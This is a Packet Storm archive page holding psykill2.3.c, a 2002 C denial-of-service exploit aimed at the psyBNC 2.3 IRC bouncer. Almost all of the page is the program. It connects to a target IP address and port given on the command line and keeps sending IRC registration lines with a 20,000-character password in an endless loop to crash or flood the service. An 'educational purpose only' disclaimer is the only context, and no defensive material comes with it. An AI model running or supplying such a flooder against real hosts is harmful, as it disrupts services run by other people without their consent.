exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

psykill2.3.c

psykill2.3.c
Posted May 14, 2002
Authored by Guile Cool

Psybnc v2.3 denial of service exploit. Sends a 20000 character password.

tags | denial of service
SHA-256 | b68a05e384ec52f9ec173ea2e8f4f7a4510a639aefa527c2297b94830460519a

psykill2.3.c

Change Mirror Download
/*
*
* -()- The ImperialS -()-
*
* CONFIDENTIAL - SOURCE MATERIALS
* You are not allowed to reproduce this software without ImperialS
* security's team permissions.
*
* EDUCATIONAL PURPOSE ONLY !!!
********************************************************************************
*
* (C) COPYRIGHT ImperialS Security, 2002
* All Rights Reserved
* SUBJECT: PsyBnc DoS discovered by DVDMAN (DVDMAN@L33TSECURITY.COM)
*
* AUTHOR: Guilecool 22/04/2002
*
* Greetz: Azekiel, case, TheViper, kraz|, Nyo, anakata and all #imperialspub ppl.
*
*********************************************************************************
*
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <signal.h>

void addr_initialize();
void usage();
void handle_sigtrap();


main (int argc, char *argv[])
{
int sd, i, error;
struct sockaddr_in server_addr;
char user[] = "USER imps 127.0.0.1 127.0.0.1 :*\n";
char nick[] = "NICK ImperialS\n";
char passwd[21100];
char pwd[22000];
char ch[1024];
int PORT = atoi(argv[2]);
if(argc!=3) usage();
addr_initialize(&server_addr, PORT, (long)inet_addr(argv[1]));
signal(SIGPIPE, handle_sigtrap);
sd = socket(AF_INET, SOCK_STREAM, 0);
error = connect(sd, (struct sockaddr *) &server_addr, sizeof(server_addr));
printf("\nPsyBnc 2.3 FlooDer by Guilecool -()- The ImperialS -()-\n");
sleep(3);
for (i=0; i<20000; i++) passwd[i] = 'A';
sprintf(pwd, "PASS %s\n", passwd);

if (error == 0)
{
while(1) {
send(sd, user, strlen(user)+1, 0);
sleep(1);
send(sd, nick, strlen(nick)+1, 0);
sleep(5);
send(sd, pwd, strlen(pwd)+1, 0);
// recv(sd, ch, strlen(ch), 0); //Put it if u wanna recv the response
}
}
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
address -> sin_family = AF_INET;
address -> sin_port = htons((u_short)port);
address -> sin_addr.s_addr = IPaddr;
}

void usage(int argc, char **argv)
{
fprintf(stdout, "\nUSAGE: <%s> <IP> <PORT>\n", argv[0]);
exit(0);
}

void handle_sigtrap (int signal) // anakata !!!!!!!!
{
printf("Disconnected.\n");
exit(0);
}
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close